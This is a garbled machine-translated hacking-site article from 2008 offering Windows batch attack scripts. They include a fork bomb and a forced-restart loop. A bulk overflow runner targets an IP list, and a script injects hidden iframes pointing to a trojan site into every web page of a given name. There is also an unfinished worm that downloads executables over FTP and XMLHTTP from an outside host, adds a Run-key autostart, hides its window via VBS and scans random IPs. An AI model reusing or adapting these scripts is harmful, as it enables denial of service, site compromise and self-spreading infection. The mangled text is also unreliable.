Various invasion of the batch-a vulnerability warning-the black bar safety net

2008-05-11T00:00:00
ID MYHACK58:62200819042
Type myhack58
Reporter 佚名
Modified 2008-05-11T00:00:00

Description

First:let others memory OVER(force him to restart) @echo off start cmd %0

On this 3 lines.

Second:let the other party to restart the specified number of times(victim-specific) @echo off if not exist c:\1.txt echo. >c:\1.txt & goto err1 if not exist c:\2.txt echo. >c:\2.txt & goto err1 if not exist c:\3.txt echo. >c:\3.txt & goto err1 if not exist c:\4.txt echo. >c:\4.txt & goto err1 if not exist c:\5.txt echo. >c:\5.txt & goto err1 goto err2 :err1 shutdown-s-t 0 :err2 Above you can let the other computer to restart 5 times and not restart

The third one:automatically kick people(3 3 8 9 meat Slicer protect yourself dedicated) @echo off logoff 1 del the log. bat logoff the back of 1 into their login ID number,with a query user view

Fourth: bulk auto overflow @for /f %%i in (result.txt) do 4 2 %%i 58.44.89.158 5 2 1 First own with NC listening port,open a few,and then refers to the row,will automatically overflow.

The fifth one:automatically hung it to change the home page @echo off cls rem directly hit the batch name will help title bulk hung it,change the homepage(nerve-wracking QQ:4 4 7 2 2 8 4 3 7). color A set pan=%1 set ye=%2 set dai=%3 if "%pan%"=="" goto e1 if "%ye%"=="" goto e1 if "%dai%"=="" goto e1 if "%dai%"=="htm.txt" goto u1 forfiles /p %pan% /m %ye% /s /c "cmd /c if @isdir==FALSE echo ^<iframe src="http://%dai%" width="0" height="0" frameborder="0"^> >>@path" echo. echo code all insert completion!!!! echo. pause goto e1 :u1 echo You are now operating will make the%pan%pan under,all named%ye%content into which you want to change the content. echo it will be very dangerous,you really want to do this? Carriage return but confirm,Ctrl+c to cancel the operation. pause forfiles /p %pan% /m %ye% /s /c "cmd /c if @isdir==FALSE copy %1\htm.txt @path /y" echo. echo home all of the change complete the required!!!! If you find that there is no replacement success,please be%ye%file read-only attribute removed. echo. pause :e1 echo. echo this batch is only applicable to 2 0 0 3 system,the other system you want to use,please would like. exe copied to the system disk system32 directory echo usage:snj ^<search letter^> ^<file name^> ^<net horse address^> echo example:snj d:\ index. asp www.muma.com/mm.htm echo the batch will automatically add^<iframe^>tag echo. echo if you want to change all of the website's home page! In a batch file in the same directory,create a new named htm. txt the text file. echo and then want to change the code to add COPY to the inside save. Then the command of the^<net horse address^>input to the htm. txt can. echo example:snj d:\ index. asp htm.txt echo. echo in order to be able to accurately perform batch please it is best to first put the Notepad's"word wrap feature removed",so the command remains in line to be executed correctly. echo. echo use this batch cause all the consequences I am not responsible for,please use caution! echo.

Sixth:the use of batch writing to exploit system vulnerabilities to spread worms Originally wanted to write after doing the tutorial,going to school,so put the idea to tell everyone,we can be the first to write yourself to write,I have time to finish writing to the group. These are my unfinished batch,we can on this basis according to I said the following ideas to continue writing del c:\42.exe del c:\nc.exe del c:\ip.exe echo dim wsh > %systemroot%\help\test. vbs echo set wsh=CreateObject("WScript. Shell") >> %systemroot%\help\test. vbs echo wsh. run "cmd /c %systemroot%\help\nc-v-l-p 8 1 0 < %systemroot%\help\or.txt",0 >> %systemroot%\help\test. vbs echo dim wsh > %systemroot%\help\test2. vbs echo set wsh=CreateObject("WScript. Shell") >> %systemroot%\help\test2. vbs echo wsh. run "cmd /c start %systemroot%\help\good. bat",0 >> %systemroot%\help\test2. vbs echo open 10.0.0.5 > %systemroot%\help\ftp.txt echo open myyes >> %systemroot%\help\ftp.txt echo 1 >> %systemroot%\help\ftp.txt echo binary >> %systemroot%\help\ftp.txt echo get 42.exe c:\42.exe >> %systemroot%\help\ftp.txt echo get nc.exe c:\nc.exe >> %systemroot%\help\ftp.txt echo get ip.exe c:\ip.exe >> %systemroot%\help\ftp.txt echo bye >> %systemroot%\help\ftp.txt echo echo Set xPost = CreateObject("Microsoft. XMLHTTP") ^>1. vbs > %systemroot%\help\or.txt echo echo xPost. Open "GET","http://10.0.0.5/my.exe&quo...,0 ^>^>1. vbs >> %systemroot%\help\or.txt echo echo xPost. Send() ^>^>1. vbs >> %systemroot%\help\or.txt echo echo Set sGet = CreateObject("ADODB. Stream") ^>^>1. vbs >> %systemroot%\help\or.txt echo echo sGet. Mode = 3 ^>^>1. vbs >> %systemroot%\help\or.txt echo echo sGet. Type = 1 ^>^>1. vbs >> %systemroot%\help\or.txt echo echo sGet. Write(xPost. responseBody) ^>^>1. vbs >> %systemroot%\help\or.txt echo echo sGet. SaveToFile "d:\my.exe",2 ^>^>1. vbs >> %systemroot%\help\or.txt echo echo 1. vbs ^>^>1. vbs >> %systemroot%\help\or.txt echo echo my.exe ^>^>1. vbs >> %systemroot%\help\or.txt echo Windows Registry Editor Version 5.00 > %systemroot%\help\1. reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %systemroot%\help\1. reg echo "SKYNET Personal FireWall"="F:\\ 系统 安全 工具 \\FireWall\\PFW.exe" >> %systemroot%\help\1. reg echo "1"="%systemroot%\\help\\test2. vbs" >> %systemroot%\help\1. reg

if not exist %systemroot%\help\good. bat copy good. bat %systemroot%\help\good. bat & %systemroot%\help\test2. vbs & del good. bat regedit-s %systemroot%\help\1. reg ftp-s:%systemroot%\help\ftp.txt the move c:\nc.exe %systemroot%\help\ /y the move c:\42.exe %systemroot%\help\ /y the move c:\ip.exe %systemroot%\help\ /y %systemroot%\help\test. vbs rem for /f %%i in (result1.txt) do set a=%%i rem for /f %%j in (result.txt) do 4 2% a% %%j 8 1 0 Preparation: 1:find a reverse connection of the overflow to attack the program,such as ms06040 vulnerability 2:find me a free FTP space,it is best to send the domain name 3:Using what you know of the high-level language one can generate a random range of IP address and find the local IP of the tool. Ideas: Use the for statement to specify the text in the IP for the overflow,and then use an if statement to determine whether the overflow is successful, if successful, open a NC listener port,NC followed by a < input symbol Enter the content for download this batch file,then execute this batch. Such is the overflow of the machine and in him there running I the door of the batch,thereby to the automatic propagation of the object.

The batch-generated file set into a directory,%systemroot%system variable directly into the system directory Because the batch run will flash a command window,I can use a VBS script to run our batch,so you won't have any window appears,the script is as follows echo dim wsh > %systemroot%\help\test. vbs echo set wsh=CreateObject("WScript. Shell") >> %systemroot%\help\test. vbs echo wsh. run "cmd /c %systemroot%\help\nc-v-l-p 8 1 0 < %systemroot%\help\or.txt",0 >> %systemroot%\help\test. vbs

Generate a random IP tool VB code Private Sub Form_Load() Dim fso As New FileSystemObject Dim a, b, c, d As Integer Dim ph, e As String ph = App. Path & "\" & "ip.txt" Randomize a = Int(2 5 3 * Rnd + 1) b = Int(2 5 3 * Rnd + 1) c = Int(2 4 0 * Rnd + 1) Open the ph For Output As #1 For i = c To c + 7 For j = 1 To 2 5 4 e = a & "." & amp; b & "." & i & "." & j Print #1, e DoEvents Next j Next i Close #1 Unload Me End Sub